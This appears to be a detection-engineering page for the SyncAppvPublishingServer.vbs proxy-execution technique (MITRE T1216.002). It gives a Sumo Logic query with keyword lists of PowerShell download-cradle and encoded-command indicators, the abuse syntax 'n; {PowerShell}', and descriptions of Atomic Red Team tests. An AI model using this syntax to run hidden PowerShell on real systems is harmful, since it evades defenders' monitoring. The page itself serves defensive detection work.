Detect SyncAppvPublishingServer in Sumo Logic CSE
Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious PowerShell commands, bypassing execution restrictions and evading defensive countermeasures. SyncAppvPublishingServer.vbs is a legitimate, Microsoft-signed Visual Basic script associated with Windows Application Virtualization (App-V), located in System32 and commonly executed via wscript.exe. By embedding PowerShell commands in the script's argument using the syntax `SyncAppvPublishingServer.vbs "n; {PowerShell}"`, adversaries can invoke PowerShell logic through a trusted signed host process rather than calling powershell.exe directly. This technique has been observed in DarkHotel APT and BlueNoroff campaigns as a means of evading script-block logging, execution policy restrictions, and process-based detection rules that focus on powershell.exe as the initiating process.
MITRE ATT&CK
- Tactic
- Defense Evasion
- Technique
- T1216 System Script Proxy Execution
- Sub-technique
- T1216.002 SyncAppvPublishingServer
- Canonical reference
- https://attack.mitre.org/techniques/T1216/002/
Sumo Detection Query
(_sourceCategory=*windows* OR _sourceCategory=*sysmon* OR _sourceCategory=*endpoint*)
| where EventCode = "1" OR EventID = "1"
| eval image_lower = toLowerCase(Image)
| eval cmd_lower = toLowerCase(CommandLine)
| eval parent_image_lower = toLowerCase(ParentImage)
| eval parent_cmd_lower = toLowerCase(ParentCommandLine)
| where (image_lower matches "*wscript.exe"
OR image_lower matches "*cscript.exe"
OR image_lower matches "*powershell.exe"
OR image_lower matches "*pwsh.exe")
AND (
cmd_lower matches "*syncappvpublishingserver*"
OR parent_cmd_lower matches "*syncappvpublishingserver*"
)
| eval IsSyncAppvDirect = if(
(image_lower matches "*wscript.exe" OR image_lower matches "*cscript.exe")
AND cmd_lower matches "*syncappvpublishingserver*",
1, 0
)
| eval HasPSPayload = if(
cmd_lower matches "*invoke-expression*"
OR cmd_lower matches "*iex(*"
OR cmd_lower matches "*iex *"
OR cmd_lower matches "*invoke-webrequest*"
OR cmd_lower matches "*net.webclient*"
OR cmd_lower matches "*downloadstring*"
OR cmd_lower matches "*downloadfile*"
OR cmd_lower matches "*-encodedcommand*"
OR cmd_lower matches "*-enc *"
OR cmd_lower matches "*new-object*"
OR cmd_lower matches "*start-process*"
OR cmd_lower matches "*bypass*"
OR cmd_lower matches "*shellcode*"
OR cmd_lower matches "*frombase64string*"
OR cmd_lower matches "*amsiutils*",
1, 0
)
| eval IsPSFromSyncAppv = if(
(image_lower matches "*powershell.exe" OR image_lower matches "*pwsh.exe")
AND (parent_image_lower matches "*wscript.exe" OR parent_image_lower matches "*cscript.exe")
AND parent_cmd_lower matches "*syncappvpublishingserver*",
1, 0
)
| eval IsUnexpectedParent = if(
(image_lower matches "*wscript.exe" OR image_lower matches "*cscript.exe")
AND cmd_lower matches "*syncappvpublishingserver*"
AND !(parent_image_lower matches "*explorer.exe")
AND !(parent_image_lower matches "*svchost.exe")
AND !(parent_image_lower matches "*services.exe")
AND !(parent_image_lower matches "*winlogon.exe")
AND !(parent_image_lower matches "*cmd.exe"),
1, 0
)
| where IsSyncAppvDirect = 1 OR IsPSFromSyncAppv = 1 OR IsUnexpectedParent = 1
| eval DetectionReason = if(IsPSFromSyncAppv = 1 AND HasPSPayload = 1,
"PowerShell spawned by SyncAppvPublishingServer proxy with PS payload",
if(IsSyncAppvDirect = 1 AND HasPSPayload = 1,
"SyncAppvPublishingServer with embedded PowerShell payload",
if(IsPSFromSyncAppv = 1,
"PowerShell spawned by SyncAppvPublishingServer proxy",
if(IsUnexpectedParent = 1,
"SyncAppvPublishingServer invoked from unexpected parent",
"SyncAppv-Generic"))))
| eval RiskScore = if(IsPSFromSyncAppv = 1 AND HasPSPayload = 1, 90,
if(IsSyncAppvDirect = 1 AND HasPSPayload = 1, 85,
if(IsPSFromSyncAppv = 1, 75,
if(IsUnexpectedParent = 1, 60, 50))))
| table _messageTime, Computer, User, Image, CommandLine, ParentImage, ParentCommandLine, DetectionReason, RiskScore
| sort by RiskScore desc, _messageTime descDetects T1216.002 SyncAppvPublishingServer.vbs abuse by parsing Sysmon Process Create (Event ID 1) events in Sumo Logic. Mirrors the three-branch SPL detection logic: direct SyncAppvPublishingServer invocation with PowerShell payload indicators, PowerShell spawned as a child of wscript/cscript that referenced SyncAppvPublishingServer, and SyncAppvPublishingServer executed from an unexpected parent process. Computes risk scores and detection reasons for analyst triage. Requires Windows Event logs or Sysmon forwarded to Sumo Logic with Image, CommandLine, ParentImage, and ParentCommandLine fields parsed.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate App-V publishing workflows where IT administrators or provisioning agents call SyncAppvPublishingServer.vbs via wscript.exe and the command line includes PowerShell arguments for App-V environment configuration or streaming server registration
- Enterprise MDM or endpoint management systems (SCCM, Tanium, Intune) orchestrating App-V deployment sequences that invoke SyncAppvPublishingServer followed by PowerShell configuration steps as a standard application lifecycle operation
- Developer or QA workstations where App-V packaging toolchains are used alongside PowerShell automation scripts for testing virtualized application packaging and publishing pipelines
Other platforms for T1216.002
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1SyncAppvPublishingServer PowerShell Proxy — Benign Command
Expected signal: Sysmon Event ID 1: wscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs' and the argument 'n; whoami'. PowerShell ScriptBlock Log Event ID 4104 may capture the proxied command execution depending on the App-V configuration. Security Event ID 4688 (if command line auditing enabled) for wscript.exe.
- Test 2SyncAppvPublishingServer PowerShell Proxy — Encoded Command
Expected signal: Sysmon Event ID 1: wscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs', '-encodedCommand', and the Base64 payload. PowerShell ScriptBlock Log Event ID 4104 capturing the decoded command 'Write-Output Argus-Test-T1216.002'. If PowerShell spawns as a child process, a second Sysmon Event ID 1 for powershell.exe with parent=wscript.exe.
- Test 3SyncAppvPublishingServer PowerShell Proxy — Download Cradle Simulation
Expected signal: Sysmon Event ID 1: wscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs', 'Net.WebClient', 'DownloadString', and 'IEX'. Sysmon Event ID 3: network connection attempt to 127.0.0.1:8080 originating from wscript.exe or a child powershell.exe. PowerShell ScriptBlock Log Event ID 4104 capturing the download cradle code.
- Test 4SyncAppvPublishingServer via cmd.exe — Indirect Invocation
Expected signal: Sysmon Event ID 1 for cmd.exe (from whatever launched the test), then Sysmon Event ID 1 for wscript.exe with ParentImage=cmd.exe and CommandLine containing 'SyncAppvPublishingServer.vbs' and the PowerShell Get-Process command. The parent-child chain cmd.exe -> wscript.exe -> [powershell proxy] is captured.
References (9)
- https://attack.mitre.org/techniques/T1216/002/
- https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/
- https://www.trellix.com/en-ca/about/newsroom/stories/research/suspected-darkhotel-apt-activity-update/
- https://securelist.com/bluenoroff-methods-bypass-motw/108383/
- https://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html
- https://x.com/monoxgas/status/895045566090010624
- https://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/
- https://learn.microsoft.com/en-us/windows/application-management/app-v/appv-getting-started
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.002/T1216.002.md
Unlock Pro Content
Get the full detection package for T1216.002 including response playbook, investigation guide, and atomic red team tests.